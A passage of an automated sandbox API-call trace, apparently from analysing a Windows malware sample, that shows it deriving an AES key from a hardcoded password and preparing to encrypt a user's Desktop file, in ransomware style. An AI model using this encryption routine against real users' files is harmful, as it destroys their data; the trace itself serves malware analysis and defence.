Size=0x10) returned 0x43ca8c8 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.516] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0125.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.518] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.518] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.518] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0125.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0125.521] CloseHandle (hObject=0x2a0) returned 1 [0125.521] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.521] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.521] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dc4f60, ftCreationTime.dwHighDateTime=0x1d5ea39, ftLastAccessTime.dwLowDateTime=0xee99dd0, ftLastAccessTime.dwHighDateTime=0x1d5e81b, ftLastWriteTime.dwLowDateTime=0xee99dd0, ftLastWriteTime.dwHighDateTime=0x1d5e81b, nFileSizeHigh=0x0, nFileSizeLow=0x1449e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="QKxk.mp3", cAlternateFileName="")) returned 0x41ac500 [0125.521] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.522] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.522] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0125.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0125.522] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0125.523] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0125.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.523] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0125.523] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.523] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.523] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0125.538] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0125.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.556] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0125.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0125.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0125.556] CryptHashData (hHash=0x41ac600, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0125.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.556] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0125.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca880, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0125.557] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0125.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0125.557] CryptDestroyHash (hHash=0x41ac600) returned 1 [0125.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0125.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0125.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0125.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0125.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0125.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0125.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0125.558] RtlAllocateHeap 